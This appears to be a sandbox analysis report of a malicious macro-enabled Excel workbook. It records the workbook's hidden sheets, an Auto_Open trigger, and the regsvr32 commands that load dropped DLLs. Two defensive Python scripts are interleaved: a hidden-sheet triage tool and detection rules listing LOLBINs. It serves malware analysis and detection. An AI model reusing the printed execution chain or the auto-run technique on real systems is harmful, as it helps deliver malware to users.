Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023F88D 4_2_0023F88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00232E8C 4_2_00232E8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023EA8C 4_2_0023EA8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00234497 4_2_00234497
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00243E98 4_2_00243E98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024609A 4_2_0024609A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023E4E2 4_2_0023E4E2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002506E7 4_2_002506E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024E2E1 4_2_0024E2E1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023DAE6 4_2_0023DAE6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024E4E3 4_2_0024E4E3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00248EF4 4_2_00248EF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023FEF2 4_2_0023FEF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023D0F7 4_2_0023D0F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002492F0 4_2_002492F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002486C1 4_2_002486C1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024EECF 4_2_0024EECF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002446DD 4_2_002446DD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023192C 4_2_0023192C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023D933 4_2_0023D933
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00244930 4_2_00244930
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00237336 4_2_00237336
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00231B3F 4_2_00231B3F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00234D13 4_2_00234D13
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00235717 4_2_00235717
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023AF67 4_2_0023AF67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00236F64 4_2_00236F64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023BF6E 4_2_0023BF6E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024F571 4_2_0024F571
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00234949 4_2_00234949
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024FF4A 4_2_0024FF4A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00239B4C 4_2_00239B4C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023C14C 4_2_0023C14C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024815D 4_2_0024815D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00235FA3 4_2_00235FA3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002351B7 4_2_002351B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024A1B1 4_2_0024A1B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024AFB1 4_2_0024AFB1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023B7B5 4_2_0023B7B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023C7B4 4_2_0023C7B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024B1BA 4_2_0024B1BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00240B84 4_2_00240B84
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00240F87 4_2_00240F87
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023C388 4_2_0023C388
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00246B98 4_2_00246B98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024C5E5 4_2_0024C5E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002475E7 4_2_002475E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024A9EE 4_2_0024A9EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002451F0 4_2_002451F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002353F6 4_2_002353F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002389F6 4_2_002389F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024DFCE 4_2_0024DFCE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00241DCF 4_2_00241DCF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040EC5D 5_2_0040EC5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041C064 5_2_0041C064
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00420A1E 5_2_00420A1E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041E63C 5_2_0041E63C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00409C3D 5_2_00409C3D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00405AC9 5_2_00405AC9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041EECF 5_2_0041EECF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00408ED3 5_2_00408ED3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040E4E2 5_2_0040E4E2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040FEF2 5_2_0040FEF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00402E8C 5_2_00402E8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041609A 5_2_0041609A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00412CAC 5_2_00412CAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040C14C 5_2_0040C14C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041E978 5_2_0041E978
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00407336 5_2_00407336
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041C5E5 5_2_0041C5E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004025E7 5_2_004025E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004151F0 5_2_004151F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00410B84 5_2_00410B84
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00410F87 5_2_00410F87
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00416B98 5_2_00416B98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041AFB1 5_2_0041AFB1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040B7B5 5_2_0040B7B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004051B7 5_2_004051B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00402050 5_2_00402050
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00417A53 5_2_00417A53
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041A455 5_2_0041A455
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041DC64 5_2_0041DC64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00409400 5_2_00409400
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00404E03 5_2_00404E03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041B605 5_2_0041B605
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00412606 5_2_00412606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00410A27 5_2_00410A27
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040323D 5_2_0040323D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004186C1 5_2_004186C1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004146DD 5_2_004146DD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041FADC 5_2_0041FADC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041E2E1 5_2_0041E2E1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041E4E3 5_2_0041E4E3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004206E7 5_2_004206E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040DAE6 5_2_0040DAE6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004192F0 5_2_004192F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00418EF4 5_2_00418EF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040D0F7 5_2_0040D0F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00420887 5_2_00420887
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040EA8C 5_2_0040EA8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040F88D 5_2_0040F88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00404497 5_2_00404497
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00413E98 5_2_00413E98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00417CA5 5_2_00417CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004144A7 5_2_004144A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041F6AE 5_2_0041F6AE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00407AB6 5_2_00407AB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004062BA 5_2_004062BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00403F40 5_2_00403F40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040DF44 5_2_0040DF44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00404949 5_2_00404949
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041FF4A 5_2_0041FF4A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00409B4C 5_2_00409B4C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00410552 5_2_00410552
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041815D 5_2_0041815D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00406F64 5_2_00406F64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040AF67 5_2_0040AF67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040BF6E 5_2_0040BF6E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041F571 5_2_0041F571
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00404D13 5_2_00404D13
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00405717 5_2_00405717
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040192C 5_2_0040192C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00414930 5_2_00414930
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040D933 5_2_0040D933
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00401B3F 5_2_00401B3F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00411DCF 5_2_00411DCF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041DFCE 5_2_0041DFCE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004131D5 5_2_004131D5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004175E7 5_2_004175E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041A9EE 5_2_0041A9EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004053F6 5_2_004053F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004089F6 5_2_004089F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040C388 5_2_0040C388
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00418BA1 5_2_00418BA1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040B1A1 5_2_0040B1A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00405FA3 5_2_00405FA3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041A1B1 5_2_0041A1B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040C7B4 5_2_0040C7B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004139B8 5_2_004139B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041B1BA 5_2_0041B1BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 1001A9E0 appears 189 times
Source: qd_34768.xlsm Macro extractor: Sheet name: PIMKE
Source: qd_34768.xlsm Macro extractor: Sheet name: PIMKE
Source: eVzUZ7dv5zBAXa5[1].dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eVzUZ7dv5zBAXa5[1].dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xewn.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xewn.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: workbook.xml Binary string: (2)\CIR\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F5AAA563-2BE5-4D04-A527-156FA41B3CA2}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Odjfs" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Dghdb" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Vghsg" sheetId="4" state="hidden" r:id="rId4"/><sheet name="Urgds" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Njkg" sheetId="6" state="hidden" r:id="rId6"/><sheet name="PIMKE" sheetId="7" state="hidden" r:id="rId7"/></sheets><definedNames><definedName name="IVFB1">PIMKE!$C$14</definedName><definedName name="IVFB2">PIMKE!$C$16</definedName><definedName name="IVFB3">PIMKE!$C$18</definedName><definedName name="IVFB4">PIMKE!$C$20</definedName><definedName name="IVFB5">PIMKE!$C$22</definedName><definedName name="IVFB6">PIMKE!$C$24</definedName><definedName name="IVFB7">PIMKE!$C$26</definedName><definedName name="_xlnm.Auto_Open567980">PIMKE!$C$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:Single"/><xcalcf:feature name="microsoft.com:FV"/><xcalcf:feature name="microsoft.com:CNMTM"/><xcalcf:feature name="microsoft.com:LET_WF"/><xcalcf:feature name="microsoft.com:LAMBDA_WF"/></xcalcf:calcFeatures></ext></extLst></workbook>
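The workbook.xml string above is the static giveaway for this sample: six of seven sheets carry state="hidden", and the defined name _xlnm.Auto_Open567980 resolves to PIMKE!$C$1, which Excel treats as an Excel 4.0 auto-run entry point because the name begins with Auto_Open (the trailing digits do not disable it). The following triage script is an added example for this report, not Joe Sandbox code and not anything shipped with the sample: it parses a workbook part for hidden sheets and auto-exec defined names and cross-references the two. The embedded SAMPLE_WORKBOOK_XML is a constructed, minimal, well-formed reconstruction of the sheet list and defined names the sandbox printed (the real part is only shown truncated above). The xlMacrosheet relationship type used by triage_xlsm() is the standard one Excel writes to xl/_rels/workbook.xml.rels; the report does not show that part, so whether this sample stores PIMKE under xl/macrosheets/ is an assumption.

```python
"""Static triage of an .xlsm workbook part: hidden sheets and Excel 4.0 auto-exec names.

Added example for this report; it is not Joe Sandbox code and does not reproduce the
real qd_34768.xlsm, only the <sheets>/<definedNames> the sandbox printed.
"""
import re
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List, Tuple

NS_MAIN = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
# Relationship type Excel writes for XLM (Excel 4.0) macro sheets in workbook.xml.rels
XLM_REL_TYPE = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"
# Excel fires a defined name as an auto-exec trigger when it *starts* with one of these
# (case-insensitive); the built-in "_xlnm." marker may or may not prefix it, and trailing
# junk such as "567980" does not disable the trigger.
AUTO_EXEC_RE = re.compile(r"^(?:_xlnm\.)?auto_(?:open|close|activate|deactivate)", re.I)

# Constructed sample: a minimal well-formed workbook.xml carrying the same sheet list and
# defined names that the sandbox extracted from the sample (the report shows only a
# truncated fragment of the real part).
SAMPLE_WORKBOOK_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets>
    <sheet name="Sheet" sheetId="1" r:id="rId1"/>
    <sheet name="Odjfs" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Dghdb" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="Vghsg" sheetId="4" state="hidden" r:id="rId4"/>
    <sheet name="Urgds" sheetId="5" state="hidden" r:id="rId5"/>
    <sheet name="Njkg" sheetId="6" state="hidden" r:id="rId6"/>
    <sheet name="PIMKE" sheetId="7" state="hidden" r:id="rId7"/>
  </sheets>
  <definedNames>
    <definedName name="IVFB1">PIMKE!$C$14</definedName>
    <definedName name="IVFB2">PIMKE!$C$16</definedName>
    <definedName name="IVFB3">PIMKE!$C$18</definedName>
    <definedName name="IVFB4">PIMKE!$C$20</definedName>
    <definedName name="IVFB5">PIMKE!$C$22</definedName>
    <definedName name="IVFB6">PIMKE!$C$24</definedName>
    <definedName name="IVFB7">PIMKE!$C$26</definedName>
    <definedName name="_xlnm.Auto_Open567980">PIMKE!$C$1</definedName>
  </definedNames>
</workbook>
"""


def triage_workbook_xml(xml_text: str) -> dict:
    """Return sheet visibility, auto-exec names and findings for one workbook.xml."""
    root = ET.fromstring(xml_text)
    sheets: Dict[str, str] = {}
    for sheet in root.iter(NS_MAIN + "sheet"):
        sheets[sheet.get("name", "")] = sheet.get("state", "visible")
    hidden = [n for n, s in sheets.items() if s in ("hidden", "veryHidden")]

    auto_exec: List[Tuple[str, str]] = []
    for dn in root.iter(NS_MAIN + "definedName"):
        name = dn.get("name", "")
        if AUTO_EXEC_RE.match(name):
            auto_exec.append((name, (dn.text or "").strip()))

    findings: List[str] = []
    for name, target in auto_exec:
        # "PIMKE!$C$1" -> "PIMKE"; names with spaces arrive quoted, "'My Sheet'!$A$1"
        sheet_ref = target.split("!", 1)[0].strip("'")
        if sheet_ref in hidden:
            findings.append(f"auto-exec name {name} -> {target} lands on hidden sheet {sheet_ref}")
        else:
            findings.append(f"auto-exec name {name} -> {target}")
    if len(sheets) > 1 and len(hidden) >= len(sheets) - 1:
        visible = [n for n in sheets if n not in hidden]
        findings.append(f"{len(hidden)} of {len(sheets)} sheets hidden; only {visible} visible")
    return {"sheets": sheets, "hidden_sheets": hidden, "auto_exec": auto_exec, "findings": findings}


def triage_xlsm(path: str) -> dict:
    """Same checks on a file on disk, plus the XLM macrosheet evidence from the zip container."""
    with zipfile.ZipFile(path) as zf:
        names = zf.namelist()
        result = triage_workbook_xml(zf.read("xl/workbook.xml").decode("utf-8"))
        result["macrosheet_parts"] = [n for n in names if n.startswith("xl/macrosheets/")]
        result["xlm_relationships"] = 0
        if "xl/_rels/workbook.xml.rels" in names:
            rels = ET.fromstring(zf.read("xl/_rels/workbook.xml.rels"))
            result["xlm_relationships"] = sum(1 for r in rels.iter() if r.get("Type") == XLM_REL_TYPE)
    return result


if __name__ == "__main__":
    import json
    print(json.dumps(triage_workbook_xml(SAMPLE_WORKBOOK_XML), indent=2))
```

Run against the constructed part this reports one auto-exec name landing on a hidden sheet and six of seven sheets hidden, which is exactly the pattern the "Hidden Macro 4.0" classification above keys on; on a real file, triage_xlsm() adds whether the hidden sheets are XLM macro sheets rather than ordinary worksheets.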
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: qd_34768.xlsm ReversingLabs: Detection: 40%
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd" Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn" Jump to behavior
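The process chain recorded above (EXCEL.EXE spawning regsvr32.exe -s ..\xewn.dll, then regsvr32.exe spawning regsvr32.exe /s on files named *.jrd and *.sfn inside freshly created SysWOW64 subdirectories) is what the "Microsoft Office Product Spawning Windows Shell" and "Regsvr32 Command Line Without DLL" Sigma hits in the summary key on. The rules below are an added example for this report, written as plain Python over process-creation events so they can be run offline; they are not the Sigma rules the sandbox fired and not Joe Sandbox code. The EVENTS list is constructed from the "Process created" lines above; the pid/ppid links are an assumption for the example, since the report names only the parent image, not which of the regsvr32 instances spawned which.

```python
"""Process-tree rules for the Office -> regsvr32 chain recorded above.

Added example: illustrative Python checks over constructed process-creation events,
not the Sigma rules the sandbox fired and not Joe Sandbox code.
"""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "powershell.exe", "certutil.exe"}
REGSVR32_OK_EXT = {".dll", ".ocx"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # "quoted path with spaces" | bare token

# Constructed from the report's "Process created" lines. The pid/ppid links are an
# assumption for this example: the report names only the parent image, not its pid.
EVENTS = [
    {"pid": 1, "ppid": 0,
     "image": "C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE",
     "cmdline": '"C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE" /automation -Embedding'},
    {"pid": 3, "ppid": 1,
     "image": "C:\\Windows\\SysWOW64\\regsvr32.exe",
     "cmdline": "C:\\Windows\\SysWow64\\regsvr32.exe -s ..\\xewn.dll"},
    {"pid": 4, "ppid": 3,
     "image": "C:\\Windows\\SysWOW64\\regsvr32.exe",
     "cmdline": 'C:\\Windows\\SysWOW64\\regsvr32.exe /s "C:\\Windows\\SysWOW64\\Onodwrlgmyciiaw\\qayqfx.jrd"'},
    {"pid": 5, "ppid": 4,
     "image": "C:\\Windows\\SysWOW64\\regsvr32.exe",
     "cmdline": 'C:\\Windows\\SysWOW64\\regsvr32.exe /s "C:\\Windows\\SysWOW64\\Yyhjz\\waeusmddlxyznd.sfn"'},
]


def split_cmdline(cmdline: str) -> List[str]:
    """Minimal Windows-style tokenizer: a quoted path with spaces stays one argument."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def regsvr32_module(cmdline: str) -> Optional[str]:
    """The module regsvr32 will load: the first argument that is not a /switch or -switch."""
    for tok in split_cmdline(cmdline)[1:]:
        if not tok.startswith(("/", "-")):
            return tok
    return None


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs; one event can fire several rules."""
    by_pid = {e["pid"]: e for e in events}
    alerts: List[Tuple[str, int]] = []
    for e in events:
        child = ntpath.basename(e["image"]).lower()
        parent = by_pid.get(e["ppid"])
        parent_name = ntpath.basename(parent["image"]).lower() if parent else ""

        if parent_name in OFFICE_APPS and child in LOLBINS:
            alerts.append(("office_spawns_lolbin", e["pid"]))
        if child != "regsvr32.exe":
            continue
        if parent_name == "regsvr32.exe":
            alerts.append(("regsvr32_spawns_regsvr32", e["pid"]))
        module = regsvr32_module(e["cmdline"])
        if module is None:
            continue
        low = module.lower()
        # Sigma "Regsvr32 Command Line Without DLL": the module is not a .dll/.ocx
        if ntpath.splitext(low)[1] not in REGSVR32_OK_EXT:
            alerts.append(("regsvr32_non_dll_module", e["pid"]))
        # "..\xewn.dll": a relative path resolved against Excel's working directory
        if not ntpath.isabs(low):
            alerts.append(("regsvr32_relative_module_path", e["pid"]))
        # a module one directory below System32/SysWOW64: the staging layout the report shows
        for prefix in SYSTEM_DIRS:
            if low.startswith(prefix) and "\\" in low[len(prefix):]:
                alerts.append(("regsvr32_module_in_system_subdir", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:34s} pid={pid}")
```

Each of the three regsvr32 instances fires at least one rule and the two second-stage instances fire three, while the EXCEL.EXE event itself fires none; in a real pipeline the parent link would come from the EDR's ParentProcessId rather than the assumed pid values here, and the non-DLL-extension rule needs the same benign exclusions the public Sigma rule carries before it is deployed.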
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$qd_34768.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR229C.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@7/9@1/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001741F __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance, 3_2_1001741F
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040F7F9 CreateToolhelp32Snapshot, 5_2_0040F7F9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10009530 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z, 3_2_10009530
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
